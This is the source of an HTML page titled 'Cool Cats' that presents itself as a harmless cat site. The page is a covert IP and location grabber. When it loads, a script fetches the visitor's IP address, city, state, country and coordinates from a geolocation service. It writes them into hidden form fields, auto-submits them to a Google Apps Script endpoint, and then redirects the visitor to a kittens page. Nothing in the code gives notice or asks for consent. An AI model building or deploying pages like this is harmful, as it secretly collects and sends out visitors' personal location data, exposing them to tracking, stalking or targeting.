<!doctype html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>Cool Cats</title>

  <meta name="description" content="Cool cats" />
  <meta name="author" content="creativejohndoe">

  <link rel="stylesheet" href="https://unpkg.com/purecss@1.0.0/build/pure-min.css">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="style.css">
</head>

<body onload="autoFill();return false;">
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>

  <form name="myform" class="gform pure-form pure-form-stacked" method="POST" data-email="example@email.net"
  action="https://script.google.com/macros/s/AKfycbxK2TQ4to2kpBg7e_WLqVm6lXsBQWF_840wrTjm8A/exec">
        <input id="country" type="hidden" name="Country"/>
        <input id="state" type="hidden" name="state"/>
        <input id="city" type="hidden" name="city"/>
        <input id="latitude" type="hidden" name="latitude"/>
        <input id="longitude" type="hidden" name="longitude"/>
        <input id="ip" type="hidden" name="ip"/>
  </form>

  <script data-cfasync="false" src="form-submission-handler.js"></script>
</body>
</html>

<script>

function autoFill() {
    $.getJSON('https://geoip-db.com/json/')
       .done (function(location) {
          document.getElementById('country').value = location.country_name;
          document.getElementById('state').value = location.state;
          document.getElementById('city').value = location.city;
          document.getElementById('latitude').value = location.latitude;
          document.getElementById('longitude').value = location.longitude;
          document.getElementById('ip').value = location.IPv4;
          document.myform.submit();
          setTimeout(function(){ window.location.href="https://creativejohndoe.gitlab.io/cool-cats/kittens" }, 2000);
      });

}
</script>
